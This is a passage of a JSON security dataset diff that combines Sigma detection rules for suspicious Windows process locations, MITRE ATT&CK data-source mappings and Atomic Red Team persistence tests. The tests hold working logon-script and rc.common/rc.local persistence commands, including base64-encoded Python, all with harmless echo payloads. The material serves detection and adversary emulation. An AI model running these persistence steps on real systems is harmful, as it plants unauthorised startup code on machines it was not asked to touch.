+ "references": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/master/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "C:\\PerfLogs\\\\*", + "C:\\$Recycle.bin\\\\*", + "C:\\Intel\\Logs\\\\*", + "C:\\Users\\Default\\\\*", + "C:\\Users\\Public\\\\*", + "C:\\Users\\NetworkService\\\\*", + "C:\\Windows\\Fonts\\\\*", + "C:\\Windows\\Debug\\\\*", + "C:\\Windows\\Media\\\\*", + "C:\\Windows\\Help\\\\*", + "C:\\Windows\\addins\\\\*", + "C:\\Windows\\repair\\\\*", + "C:\\Windows\\security\\\\*", + "*\\RSA\\MachineKeys\\\\*", + 
"C:\\Windows\\system32\\config\\systemprofile\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Execution in Non-Executable Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "status": "experimental", + "description": "Detects a suspicious exection from an uncommon folder", + "author": "Florian Roth", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\$Recycle.bin", + "*\\Users\\All Users\\\\*", + "*\\Users\\Default\\\\*", + "*\\Users\\Public\\\\*", + "C:\\Perflogs\\\\*", + "*\\config\\systemprofile\\\\*", + "*\\Windows\\Fonts\\\\*", + "*\\Windows\\IME\\\\*", + "*\\Windows\\addins\\\\*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious MsiExec Directory", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "experimental", + "description": "Detects suspicious msiexec process starts in an uncommon directory", + "references": [ + "https://twitter.com/200_okay_/status/1194765831911215104" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2019/11/14", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\msiexec.exe" + }, + "filter": { + "Image": [ + "C:\\Windows\\System32\\\\*", + "C:\\Windows\\SysWOW64\\\\*", + "C:\\Windows\\WinSxS\\\\*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Program Location Process Starts", + "id": "f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5", + "status": "experimental", + "description": "Detects programs running in suspicious files system locations", + 
"references": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2019/01/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\$Recycle.bin", + "*\\Users\\Public\\\\*", + "C:\\Perflogs\\\\*", + "*\\Windows\\Fonts\\\\*", + "*\\Windows\\IME\\\\*", + "*\\Windows\\addins\\\\*", + "*\\Windows\\debug\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "description": "Detects suspicious process run from unusual locations", + "status": "experimental", + "references": [ + "https://car.mitre.org/wiki/CAR-2013-05-002" + ], + "author": "juju4", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*:\\RECYCLER\\\\*", + "*:\\SystemVolumeInformation\\\\*", + "C:\\\\Windows\\\\Tasks\\\\*", + "C:\\\\Windows\\\\debug\\\\*", + "C:\\\\Windows\\\\fonts\\\\*", + "C:\\\\Windows\\\\help\\\\*", + "C:\\\\Windows\\\\drivers\\\\*", + "C:\\\\Windows\\\\addins\\\\*", + "C:\\\\Windows\\\\cursors\\\\*", + "C:\\\\Windows\\\\system32\\tasks\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + { + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "status": "experimental", + "description": "Detects a suspicious svchost process start", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2017/08/15", + "logsource": { + "category": 
"process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\svchost.exe" + }, + "filter": { + "ParentImage": [ + "*\\services.exe", + "*\\MsMpEng.exe", + "*\\Mrt.exe", + "*\\rpcnet.exe" + ] + }, + "filter_null": { + "ParentImage": null + }, + "condition": "selection and not filter and not filter_null" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "status": "experimental", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2018/03/18", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "User": "NT AUTHORITY\\SYSTEM", + "Image": "*\\taskmgr.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Taskmgr as Parent", + "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "status": "experimental", + "description": "Detects the creation of a process from Windows task manager", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2018/03/13", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\taskmgr.exe" + }, + "filter": { + "Image": [ + "*\\resmon.exe", + "*\\mmc.exe", + "*\\taskmgr.exe" + ] + }, + "condition": "selection and not filter" + }, + "fields": [ + "Image", + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "low" + }, + { + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started 
in a suspicious folder", + "references": [ + "https://twitter.com/GelosSnake/status/934900723426439170" + ], + "author": "Florian Roth, Patrick Bareiss", + "date": "2017/11/27", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\svchost.exe", + "*\\rundll32.exe", + "*\\services.exe", + "*\\powershell.exe", + "*\\regsvr32.exe", + "*\\spoolsv.exe", + "*\\lsass.exe", + "*\\smss.exe", + "*\\csrss.exe", + "*\\conhost.exe", + "*\\wininit.exe", + "*\\lsm.exe", + "*\\winlogon.exe", + "*\\explorer.exe", + "*\\taskhost.exe" + ] + }, + "filter": { + "Image": [ + "C:\\Windows\\System32\\\\*", + "C:\\Windows\\SysWow64\\\\*", + "C:\\Windows\\explorer.exe", + "C:\\Windows\\winsxs\\\\*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Exotic software" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "File Hashing" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD", + "File Hashing" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image metadata", + "description": "Data and information that describe an image and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "image" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + 
"data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job metadata", + "description": "Data and information that describe a scheduled job and activity around it.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information 
about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "disabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "https://twitter.com/ItsReallyNick/status/945681177108762624", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + 
"https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1037.001", + "command_list": [ + "echo \"#{script_command}\" > %temp%\\art.bat\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"%temp%\\art.bat\" /f\n", + "echo \"echo Art \"Logon Script\" atomic test was successful. 
>> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > #{script_path}\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"#{script_path}\" /f\n" + ], + "commands": [ + { + "command": "echo \"#{script_command}\" > %temp%\\art.bat\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"%temp%\\art.bat\" /f\n", + "source": "atomics/T1037.001/T1037.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Logon Script (Windows)" + }, + { + "command": "echo \"echo Art \"Logon Script\" atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > #{script_path}\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"#{script_path}\" /f\n", + "source": "atomics/T1037.001/T1037.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Logon Script (Windows)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1037.001", + "display_name": "Boot or Logon Initialization Scripts: Logon Script (Windows)", + "atomic_tests": [ + { + "name": "Logon Scripts", + "auto_generated_guid": "d6042746-07d4-4c92-9ad8-e644c114a231", + "description": "Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\\Environment key\nthat can be viewed in the Registry Editor.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_path": { + "description": "Path to .bat file", + "type": "String", + "default": "%temp%\\art.bat" + }, + "script_command": { + "description": "Command To Execute", + "type": "String", + "default": "echo Art \"Logon Script\" atomic test was successful. 
>> %USERPROFILE%\\desktop\\T1037.001-log.txt" + } + }, + "executor": { + "command": "echo \"#{script_command}\" > #{script_path}\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"#{script_path}\" /f\n", + "cleanup_command": "REG.exe DELETE HKCU\\Environment /v UserInitMprLogonScript /f >nul 2>&1\ndel #{script_path} >nul 2>&1\ndel \"%USERPROFILE%\\desktop\\T1037.001-log.txt\" >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1037.002", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "attack_technique": "T1037.002", + "display_name": "Boot or Logon Initialization Scripts: Logon Script (Mac)", + "atomic_tests": [ + { + "name": "Logon Scripts - Mac", + "auto_generated_guid": "f047c7de-a2d9-406e-a62b-12a09d9516f4", + "description": "Mac logon script\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. Populate the plist with the location of your shell script\n\n sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. Create the required plist file in the target user's Preferences directory\n\n\t touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. Populate the plist with the location of your shell script\n\n\t defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1037.004", + "command_list": [ + "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", + "filename='/etc/rc.common';if [ ! 
-f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", + "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n" + ], + "commands": [ + { + "command": "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", + "source": "atomics/T1037.004/T1037.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Rc.common" + }, + { + "command": "filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' 